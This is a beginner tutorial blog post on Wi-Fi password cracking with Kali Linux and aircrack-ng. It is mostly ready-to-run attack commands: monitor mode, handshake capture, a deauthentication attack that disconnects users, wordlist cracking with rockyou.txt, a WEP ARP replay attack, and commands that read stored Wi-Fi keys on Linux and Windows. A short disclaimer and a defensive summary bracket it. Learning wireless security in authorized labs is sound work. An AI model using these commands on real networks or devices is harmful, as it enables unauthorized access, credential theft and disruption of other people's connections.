⚠️ Warning: Hacking unauthorized networks is a crime. Use this information only on your own networks or in legal challenges like Hack The Box. I am not responsible for any misuse.
🔍 Part One: Basics You Need to Know Before Starting
1. What is Wi-Fi and How Does It Work?
- Wi-Fi: Data exchange wirelessly via radio waves (think “radio, but for the internet!”).
- Access Point: The device that broadcasts the network (like a router).
- Data Packets: Information sent between devices (like “secret messages” that can be intercepted by sniffing).
2. Types of Wi-Fi Encryption (and Can They Be Cracked?)
| Type | Strength | Notes |
|---|---|---|
| WEP | ❌ Very Weak | Can be cracked within minutes! |
| WPA | ⚠️ Moderate | Requires a long time |
| WPA2/WPA3 | ✅ Strong | Very difficult — requires an advanced attack |
💻 Part Two: Wi-Fi Hacking Using Kali Linux (Aircrack-ng)
Required Tools
- Kali Linux — downloadable from kali.org
- Aircrack-ng — pre-installed in Kali
- A Wi-Fi adapter that supports Monitor Mode
Step 1: Enable Monitor Mode
# Temporarily stop the Wi-Fi servicesudo systemctl stop NetworkManager
# Enable monitor mode on the Wi-Fi interface (example: wlan0)sudo airmon-ng start wlan0airmon-ng switches the network card from “normal connection” mode to “sniffing” mode, capturing all packets in range.
Step 2: Discover Available Networks
# Scan nearby networkssudo airodump-ng wlan0monWhat is displayed:
- BSSID — The router’s MAC address
- CH — The network channel
- ESSID — The network name (e.g.,
STC_5G)
Step 3: Capture the Handshake
# Focus on a specific network (replace BSSID and CH with actual values)sudo airodump-ng --bssid 00:11:22:33:44:55 -c 6 --write handshake wlan0monWhen a device connects to a network, it exchanges an encryption handshake with the router. Capturing it allows us to attempt to crack the password offline.
Step 4: Deauth Attack to Capture the Handshake
# Force connected devices to reconnectsudo aireplay-ng --deauth 10 -a 00:11:22:33:44:55 wlan0monThis attack temporarily disconnects devices. When they reconnect, the handshake is captured.
Step 5: Crack the Password Using a Wordlist
# Use Aircrack-ng to decrypt (replace handshake-01.cap with your filename)sudo aircrack-ng handshake-01.cap -w /usr/share/wordlists/rockyou.txtRockYou.txt is a famous wordlist containing millions of common passwords like password123.
⏳ Time required: Minutes to hours, depending on password strength.
📱 Part Three: Retrieving Saved Wi-Fi Passwords (No Special Tools)
Some devices automatically store Wi-Fi passwords locally. These can be retrieved if you have access to the device.
On Linux
# Search NetworkManager config files for stored passwordssudo cat /etc/NetworkManager/system-connections/* | grep psk=On Windows (No Software Needed)
- Open Command Prompt (CMD) as Administrator
- Run:
netsh wlan show profile name="NetworkName" key=clearLook for Key Content in the output — that’s the password in plain text.
🔥 Practical Example: Cracking a Weak WEP Network (In ~3 Minutes)
# 1. Start monitor modesudo airmon-ng start wlan0
# 2. ARP Replay attack to increase data trafficsudo aireplay-ng --arpreplay -b 00:11:22:33:44:55 -h 66:77:88:99:AA:BB wlan0mon
# 3. Crack the encryption instantly (WEP is very weak)sudo aircrack-ng output.capThe password appears within minutes due to WEP’s fundamental cryptographic weaknesses.
Summary
Wi-Fi security heavily depends on the encryption protocol used. WEP is effectively broken and should never be used. WPA2 with a strong, unique password remains the practical standard for most users, while WPA3 offers additional protections for newer devices.
This article is part of the “Cybersecurity from Scratch” series. Always practice ethical hacking in authorized environments only.